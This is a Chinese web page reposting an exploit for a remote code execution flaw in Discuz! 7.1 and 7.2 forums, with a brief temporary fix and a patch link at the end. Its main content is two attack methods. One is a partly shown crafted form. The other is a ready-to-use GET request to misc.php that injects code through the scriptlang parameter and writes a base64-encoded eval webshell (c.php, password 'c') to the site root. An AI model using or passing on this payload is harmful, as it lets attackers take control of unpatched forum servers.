discuz!7.1、7.2 远程代码执行漏洞exp

番茄系统家园 · 2022-03-14 05:08:05

第一种方法:

先注册个用户然后把


帖子ID,指定一个存在的帖子即可:






chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');

里面有个提交地址改下,保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd


第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法:

在common.inc.php上面加上
$response=$scriptlang=array();

官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html

注:使用exp的话仅限本机测试,其他用途后果自负!

免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/1724999rH6pI.html
猜你喜欢
最新应用
热门应用